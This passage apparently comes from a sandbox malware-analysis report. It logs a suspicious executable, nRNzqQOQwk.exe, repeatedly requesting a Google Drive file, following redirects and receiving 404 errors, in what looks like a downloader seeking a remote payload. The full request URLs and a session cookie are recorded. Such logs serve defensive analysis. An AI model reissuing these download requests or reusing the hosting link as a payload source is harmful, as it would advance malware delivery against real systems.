                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:34 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:34 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-Rp3Qo15Yqz2H6IOxMRJnwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.11.2049773142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:34 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:34 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6b4nxUtM48yAR1ZBuO4biwPKd3tdXouRKAbMVj5U55tuVtehXX0n9i9EMGa5n3JYYjCIQYP2s
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:34 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-WfPEWujkleLhr6wVvKm7zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:34 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 4a 6a 58 4c 55 7a 5f 6f 32 6e 55 5f 4c 6f 6b 35 7a 47 48 57 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-JjXLUz_o2nU_Lok5zGHWQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.11.2049774142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:45 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:45 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:45 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-CrfWIZ1Qj6mqBzh92Z8EqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.11.2049775142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:45 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:45 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6rviVyHLoy3-nG-CuXrfbQ6P8mnMuGlGZlbHpw-j6LDAFi7V9gZTiMcmzg9jazfgSibDpSIBE
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:45 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: script-src 'nonce-1oCRabKA1pxrLDpkYjV2mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 66 46 73 48 34 56 4d 36 49 56 47 69 69 5f 33 75 32 4e 43 7a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9fFsH4VM6IVGii_3u2NCzw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.11.2049776142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:56 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:56 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:56 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-lP5DaGPTwBCSJBuLyxdOkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.11.2049777142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:56 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:57 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC45-i7YH9HgbwTZoFCrGyKRyVgEQlrBnLxE2vDMWXYSEBg3Dsfmtht0qa1UYFa0f-E2
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:57 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-SJ7dBqLYgQFCMsI7lb0qgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:57 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 5a 48 41 31 4e 4d 58 57 49 78 33 32 54 78 70 39 4b 71 76 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yZHA1NMXWIx32Txp9KqvlQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.11.2049778142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:07 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:07 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:07 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce--hSotlMiLEg9AAvZ2jUa7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.11.2049779142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:35:11 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:11 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7X79WSwMnVC6Dk6SezQM-LvXn1WZhUNpqNpv9HB60POcagnGdD8CIdlMJkzbopNMRY
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:11 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-XuSKyxWzvXdaWTilRNBcJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
